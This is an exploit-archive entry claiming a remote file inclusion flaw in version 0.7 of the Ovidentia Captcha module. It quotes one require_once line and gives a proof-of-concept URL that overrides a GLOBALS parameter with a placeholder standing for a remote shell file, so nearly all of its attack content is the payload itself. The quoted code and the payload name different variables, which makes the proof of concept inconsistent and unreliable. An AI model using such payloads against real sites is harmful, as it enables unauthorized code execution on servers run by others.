Ovidentia Captcha (Version 0.7) Module Remote File Inclusion Vulnerability

2015-12-17T00:00:00
ID 1337DAY-ID-24738
Type zdt
Reporter GoLd_M
Modified 2015-12-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Title: Ovidentia Module  Captcha (Version 0.7 )  Remote File Inclusion 
# Author: GoLd_M
# Download: http://www.ovidentia.org/modules/babArticle_731
  
PoC :
  
\captcha-0-7\programs\captcha.class.php
------------------------------------------------------
  
  require_once $GLOBALS['babInstallPath'].'utilit/functionalityincl.php';
  
-------------------------------------------------------
  
[+]Sploit2: http://[s0me0ne/captcha-0-7/programs/captcha.class.php?GLOBALS[babAddonPhpPath]=SHELLCODE?

#  0day.today [2018-01-02]  #